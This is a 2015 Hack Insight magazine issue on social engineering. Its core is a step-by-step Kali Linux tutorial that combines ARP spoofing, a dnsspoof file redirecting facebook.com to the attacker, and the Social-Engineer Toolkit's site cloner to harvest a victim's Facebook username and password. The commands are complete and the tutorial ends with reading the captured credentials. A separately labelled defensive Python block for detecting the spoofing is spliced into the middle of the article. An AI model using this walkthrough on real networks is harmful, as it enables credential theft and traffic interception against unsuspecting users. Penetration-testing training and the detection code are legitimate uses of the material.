His 2015 Free Set

Hack in Sight. Analyzing Human Exploits. Level: MR. ROBOT

Uploaded by dcbarrientos, 08-Dec-2015

Page 3: His 2015 Free Set

Analyzing Human Exploits Level: MR. ROBOT

3

Dear Security Professionals,

Social engineering, in the context of information security, refers to the psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme. The term "social engineering" as an act of psychological manipulation is also associated with the social sciences, but its usage has caught on among computer and information security professionals.

In this publication we introduce you to social engineering in practice. The author describes the popular Social-Engineer Toolkit (SET), a useful tool in the arsenal of every IT security professional. SET is an open-source, Python-driven tool aimed at penetration testing around social engineering. SET has been presented at large-scale conferences including Black Hat, DerbyCon, DEF CON, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and is supported heavily within the security community.

We are grateful to Mr. Vikas Kumar for creating this guide.

The unique cover design was created by Mr. Jim Steele from www.cyexdesign.com.

Enjoy the hacking!

Hack Insight Team

[Hack]in(Sight)

Editorial Section:

Authors: Vikas Kumar

Copy-editors: Robrecht Minten, Zsolt Nemeth, Phil Quinan, Larry Pool, David Sanborn (Axiom), Andy Stern.

DTP: Jim Steele, www.cyexdesign.com

Publisher: Hack Insight Press Paweł Płocki, www.hackinsight.org

Editor in Chief: Paweł Płocki, [email protected]

All trademarks presented in the magazine were used only for informative purposes.


THE SOCIAL-ENGINEER TOOLKIT (SET)

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that let you build a believable attack quickly. SET is a product of TrustedSec and was designed and developed by David Kennedy, CEO of TrustedSec. It supports Windows as well as Linux. The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering environment. TrustedSec believes that social engineering is one of the hardest attacks to protect against and is now one of the most prevalent.

The Social-Engineer Toolkit incorporates many useful social-engineering attacks in one interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. It can automatically generate exploit-hiding web pages or email messages, and can use Metasploit payloads to, for example, connect back with a shell once the page is opened.

Figure 1: Social Engineer Toolkit

What is Social Engineering?

Social engineering is the art of manipulating people into revealing confidential information that is not supposed to be disclosed. It involves gaining the trust of an individual in order to obtain confidential information. Social engineering is a non-technical attack, but it involves tactics for trapping a victim. It is the art of gathering important information about an organization, its employees, its systems and so on.

The victim can be anybody, and there is a real possibility of the hacker being victimized in turn. This can happen when the hacker is part of a group of friends: the entire group can be victimized at once, because the relationship is built on trust and tricking them emotionally is not very difficult.

Figure 2: Social Engineering

Sometimes, in the course of an ordinary conversation, we do not even realize that we are revealing personal and confidential information, or dropping hints that make the hacker's job of getting into our most personal and confidential data easier.

Some basic information that can be gathered very easily includes a person's favorite color, actor, food, car, teacher or best friend. It might even include details about childhood, school days or family. Such information can be enough to break into an account, because the secret questions used to recover a password for most applications ask for exactly these things. Assume you have become the victim: would you mind answering a question about your favorite teacher or your pet's name? A close friend attempting a social engineering attack would not even have to ask; he already knows your likes and dislikes to some extent.


Diagram 1: A sample email which can mislead the admin of an organization

Generally, if you ask for a piece of sensitive information, people naturally become suspicious immediately. If you pretend you already have the information and state it wrongly, they will frequently correct you without thinking, rewarding you with the correct piece of information you were looking for.

Do you need the Social-Engineer Toolkit for this? No: real-world attackers do not depend entirely on a toolkit to victimize anyone.

Figure 3: Social Engineering


Preventing Social Engineering:

In my opinion there is no well-defined method or application that prevents social engineering. New methods keep evolving, so keeping an eye on the different attacks is recommended.

Educating the employees of an organization and running random tests on them can help identify the weak spots within the organization. Employees should not share their passwords even with their superiors or team leaders; if a manager needs access, it should be granted through an administrator account rather than by sharing the employee's password.

Organizations have to take social engineering as seriously as other attacks: in the chart referenced below it accounts for more than 50% of the attacks counted.

Frequency of social engineering compared to other security attacks.

Figure 4: Social Engineering (Referred Link: http://solidmonster.com/what-is-social-engineering/)


CREDENTIAL HARVESTING ATTACK ALONG WITH DNS SPOOFING USING SOCIAL ENGINEERING TOOLKIT

To complete this tutorial you need the following:

Kali Linux (any version)
Windows (any version)
Both systems on the same network (in my case I am using VMware's NAT option to put both operating systems in the same network.)

As many of you already know, in a classic phishing attack the attacker creates a fake page of a trusted website, adds a script to it, uploads it to a web server such as Apache and then sends the victim a link such as http://www.fakepage.com or http://192.168.0.117. Nowadays most people are aware of this, so here we combine DNS spoofing with the phishing page: the victim types the original website address and is redirected to our phishing page without ever learning that he is on a fake page.

Let's start the practical. I am going to use Kali Linux, open a terminal and give the following command to enable IP forwarding (without it the victim's traffic, which will flow through our machine once ARP spoofing starts, would be dropped and he would lose connectivity):

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Figure 5: Enabling IP Forwarding

To confirm that IP forwarding is enabled, give the following command; the reply is 1 when enabled and 0 when not:

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

Figure 6: Confirming IP Forwarding


Now we start ARP spoofing from Kali Linux.

What is ARP spoofing? ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the attacker's MAC address being linked with the IP address of a legitimate computer or server on the network, so that traffic meant for that host is delivered to the attacker instead.

root@kali:~# arpspoof --help

Figure 7: help menu of ARP Spoof

After this we need a few details to start ARP spoofing from Kali Linux:

our interface name
the gateway IP address

Before moving ahead, let's check these details step by step. First, to check the interface name, open a terminal in Kali Linux and give the following command:

root@kali:~# ifconfig

Figure 8: checking interface name.


Now let's check the gateway IP address: open another terminal and give the following command. Use the gateway address it shows on the line marked default; yours may or may not match the one used here.

root@kali:~# route

Figure 9: checking gateway IP address.

Now we are ready to start ARP spoofing from Kali Linux.

Syntax: arpspoof -i <interface name> <gateway IP address>

root@kali:~# arpspoof -i eth0 192.168.101.2

Figure 10: starting ARP Spoofing.

Used this way, without -t, arpspoof tells every host on the segment that the gateway's IP address belongs to our MAC; add -t <victim IP> to poison only the one target.

Now we create a file in root's home directory; any name will do, but here we use the name dns-list:

root@kali:~# touch dns-list


Figure 11: creating file.

Now select Places > Home Folder.

Figure 12: Go to Root through this process

There we will find our created file with the name dns-list.


Figure 13: created file.

Now open this file in any text editor such as gedit or leafpad. In our case we open it in leafpad.

Figure 14: opening file in a text editor.

To spoof DNS you must know your own IP address, so open a terminal and give the following command:

root@kali:~# ifconfig


Figure 15: checking IP Address.

After this, go back to the editor, enter the following lines so that the victim is redirected to your system's IP address, and save the file (192.168.101.130 is the Kali system's address in this setup; use your own):

192.168.101.130 www.facebook.com
192.168.101.130 *.facebook.com
192.168.101.130 m.facebook.com

Figure 16: putting facebook DNS information to redirect on system IP address.


Now open a new terminal and give the following command to see the help menu of dnsspoof:

root@kali:~# dnsspoof --help

Figure 17: checking help menu of dns spoof.

Now start dnsspoof on the same interface with our hosts file:

root@kali:~# dnsspoof -i eth0 -f '/root/dns-list'

Figure 18: starting DNS Spoof.
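The dns-list above and the arpspoof step before it are worth seeing from both sides. The following Python is an added example, not code from this article, from dsniff or from SET. It parses the hosts file in the form dnsspoof -f takes and shows which names the three lines actually redirect (dsniff's dnsspoof matches names with fnmatch-style wildcards; first-match-wins and case-insensitive comparison are this example's assumptions), then gives two checks a defender on a Linux host on the same segment would run: the gateway's MAC drifting in the neighbour table (on Windows, arp -a shows the same table) and a public name resolving to a LAN address. The neighbour-table lines, the resolver answers and every MAC in them are constructed samples in the style of ip neigh output.

```python
# Added example: not from the Hack Insight article, dsniff or SET.
# Assumptions: dnsspoof matches names with fnmatch-style globbing, first
# matching line wins, compared case-insensitively (DNS names are
# case-insensitive). All addresses and MACs below are constructed.
import fnmatch
import ipaddress

# The tutorial's dns-list, embedded inline.
DNS_LIST = """\
192.168.101.130 www.facebook.com
192.168.101.130 *.facebook.com
192.168.101.130 m.facebook.com
"""


def parse_dnsspoof_hosts(text):
    """Parse 'IP pattern' lines (the hosts-file format given to dnsspoof -f).

    Blank lines and '#' comments are skipped; a malformed address raises
    ValueError so a typo in the file is caught before it goes live.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, pattern = line.split()[:2]
        ipaddress.ip_address(ip)  # validates, raises ValueError on junk
        entries.append((ip, pattern.lower().rstrip(".")))
    return entries


def spoofed_answer(entries, qname):
    """Return the forged A record the victim gets for qname, or None when no
    pattern matches (dnsspoof then stays silent and the real answer wins)."""
    name = qname.lower().rstrip(".")
    for ip, pattern in entries:
        if fnmatch.fnmatchcase(name, pattern):
            return ip
    return None


def parse_ip_neigh(text):
    """Map IP -> MAC from `ip neigh` lines; entries without an lladdr
    (FAILED/INCOMPLETE) are ignored."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            table[fields[0]] = fields[fields.index("lladdr") + 1].lower()
    return table


def arp_spoof_indicators(table, gateway_ip, expected_gateway_mac):
    """Findings for the attack above: the gateway IP drifting to another MAC,
    and one MAC claiming several IPs (the attacker's own entry collides with
    the poisoned gateway entry)."""
    findings = []
    mac = table.get(gateway_ip)
    if mac and mac != expected_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} moved to {mac}, "
                        f"expected {expected_gateway_mac}")
    by_mac = {}
    for ip, m in table.items():
        by_mac.setdefault(m, []).append(ip)
    for m, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {m} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return findings


def dns_spoof_indicators(answers):
    """Names in {qname: answer_ip} whose answer is not globally routable.

    A public site resolving to a LAN address is exactly what the tutorial's
    dns-list produces. Split-horizon DNS inside a company does this
    legitimately, so treat hits as leads, not verdicts.
    """
    return sorted(q for q, ip in answers.items()
                  if not ipaddress.ip_address(ip).is_global)


# Constructed samples: the victim's neighbour table before and after
# `arpspoof -i eth0 192.168.101.2`, with the gateway at 00:50:56:f1:2b:9c
# and the Kali box at 00:0c:29:aa:bb:cc.
NEIGH_BEFORE = """\
192.168.101.2 dev eth0 lladdr 00:50:56:f1:2b:9c REACHABLE
192.168.101.130 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.101.77 dev eth0 FAILED
"""
NEIGH_AFTER = """\
192.168.101.2 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
192.168.101.130 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
192.168.101.77 dev eth0 FAILED
"""

if __name__ == "__main__":
    entries = parse_dnsspoof_hosts(DNS_LIST)
    for q in ("www.facebook.com", "Login.Facebook.com", "facebook.com", "www.example.com"):
        print(f"{q:20} -> {spoofed_answer(entries, q)}")
    gw, gw_mac = "192.168.101.2", "00:50:56:f1:2b:9c"
    print("before:", arp_spoof_indicators(parse_ip_neigh(NEIGH_BEFORE), gw, gw_mac))
    print("after: ", arp_spoof_indicators(parse_ip_neigh(NEIGH_AFTER), gw, gw_mac))
    print("dns:   ", dns_spoof_indicators({"www.facebook.com": "192.168.101.130",
                                           "www.example.com": "93.184.216.34"}))
```

Two things the run makes visible: the wildcard line already covers m.facebook.com, but none of the three lines covers the bare facebook.com, so a victim who types it without www. is not redirected and would need a fourth line for the apex. The ARP check only works if the real gateway MAC was recorded before the attack, and the DNS check, as noted in the code, produces leads rather than verdicts.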


Now we move on to the Social-Engineer Toolkit. In Kali Linux, go to Application > Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit

Figure 19: starting Social Engineering Toolkit.

At the prompt SET shows on start-up, type Y to continue.

Figure 20: Starting Services of Social Engineering Toolkit.

Now select number 1 for Social-Engineering Attacks.


Figure 21: Selecting Social-Engineering Attacks.

Now select number 2 for Website Attack Vectors.

Figure 22: Selecting Website Attack Vectors.

Now select number 3 for Credential Harvester Attack Method.


Figure 23: Select Credential Harvester Attack Method.

Now select number 2 for Site Cloner.

Figure 24: Select Site Cloner

Now give our system's IP address when SET asks for the address the harvested credentials should be posted back to.


Figure 25: Giving System IP Address.

Now SET asks for the URL to clone. Enter the website you selected; in our case we use https://www.facebook.com, because in the previous pages we redirected facebook to our system's IP address. The benefit is that the cloned facebook page is now hosted on our system's IP address, so when the victim types www.facebook.com he is actually redirected to our system, where the cloned page is hosted. As usual he will try to log in, believing it is the original facebook page, and unknowingly hand his username and password to the attacker.

Figure 26: Cloning facebook page.

If a message appears asking whether to start the Apache server, simply press Y to start it.


Figure 27: starting apache server.

Now go to Windows 7, open Internet Explorer and type www.facebook.com.

Figure 28: opening facebook page.

You can see in the picture that we got a facebook page, but it is not the actual facebook page; it is a cloned page that wins the victim's trust because he thinks it is the original. With the help of dnsspoof we have simply redirected the victim to our cloned page while the URL in the address bar remains www.facebook.com. Note that this works because Internet Explorer on Windows 7 loads the page over plain HTTP; a browser that enforces HSTS for facebook.com (Chrome and Firefox carry it in their preload list) will insist on HTTPS and fail to connect to our plain-HTTP clone.


Figure 29: Redirecting a victim on cloned facebook page.

Now we enter some credentials in this cloned page.

Figure 30: putting credential.

After that, come back to Kali Linux, open a terminal and change to the location where the harvested username and password are stored:


root@kali:~# cd /var/www

Figure 31: accessing hosted file location.

To list the files and folders in this location, simply use the following command:

root@kali:~# ls

Figure 32: accessing all files and folder information.

Now simply use the following command to view the username and password; the harvester file name carries the timestamp of the capture, so yours will differ:

root@kali:~# cat 'harvester_2015-08-17 19:33:48.658364.txt'


Figure 33: enjoying username and password details.

I hope you like this article and my other articles published in Hack Insight Magazine. For me, social engineering is a new area of expertise, and if you find any difficulty completing this practical at your location you may contact me anytime. My contact details are on the next page. Thank you for your kind support.


About the Author

VIKAS KUMAR, Ethical Hacker | Speaker | Penetration Tester (MBA in Information Systems, CEH, ACSP and CHCISE), is an Information Security Analyst and co-founder of Cyber Hunt Technology, where his responsibilities include analyzing web applications, networks, databases and servers, and discovering new ways of uncovering threats, vulnerabilities and security risks. As an Information Security Analyst he focuses on threat intelligence and the investigation of advanced cyber-attacks.

Contact Information

Telephone: (+91) 9945-201-734
Email: [email protected], [email protected]
Web: www.cyber-hunt.com
Facebook: https://www.facebook.com/cyberhunt2011
LinkedIn: https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro
Cyber Hunt Facebook Page: https://www.facebook.com/pages/Cyber-Hunt-Security-Group-of-Technology-P-Ltd/559533680741975?ref=tn_tnmn


Did you enjoy reading this issue?

Find out more in the Hack Insight Subscription! Subscribe to Hack Insight and stay up to date with advanced hacking and security techniques. A single subscription costs $174 and includes:

--> 24 unique publications per year.
--> Access to all the previous releases from the first HiS issue.
--> 2 special "Best of Hack Insight" issues each year.

Hack Insight Subscription is prepared for IT security professionals, enthusiasts, engineers, managers and geeks who want to improve their advanced technical knowledge thanks to articles written by world-class experts. The subscription covers many different topics, such as network scanning, malware, cloud security, DDoS, hacking IDs/passwords, mobile and cyber security, reverse engineering, WiFi vulnerabilities and much more.
